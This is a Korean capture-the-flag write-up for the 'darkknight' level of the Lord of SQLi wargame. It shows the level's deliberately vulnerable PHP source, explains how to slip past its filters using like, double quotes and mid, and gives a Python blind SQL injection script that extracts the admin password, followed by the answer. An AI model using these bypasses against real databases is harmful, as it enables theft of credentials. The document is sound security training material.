728x90
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); // prob(대소문자 모두 필터링), _, ., () 필터링
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); // pw 값에 ' 필터링
if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe"); // no 값에 ', substr, ascii 필터링
$query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight");
highlight_file(__FILE__);
?>
= 대신 like, ' 대신 ", substr 대신 mid 함수를 사용해서 우회했다.
import requests
url='https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php'
cookie={'PHPSESSID':'자신의 세션 id'}
HEX='0123456789ABCDEF'
#16
def find_pw_len():
pw_len=1
while True:
r=requests.get(url+'?no=123 or id like "admin" and length(hex(pw)) like {}'.format(pw_len),cookies=cookie)
if 'Hello admin' in r.text:
return pw_len
else:
pw_len+=1
#0b70ea1f
def find_pw():
pw_len=find_pw_len()
tmp=''
for i in range(1,pw_len+1):
for j in HEX:
r=requests.get(url+'?no=123 or id like "admin" and mid(hex(pw),{},1) like "{}"'.format(i,j),cookies=cookie)
if 'Hello admin' in r.text:
tmp+=j
if len(tmp)==2:
print(chr(int(tmp,16)),end="")
tmp=''
break
find_pw()
답: ?pw=0b70ea1f
728x90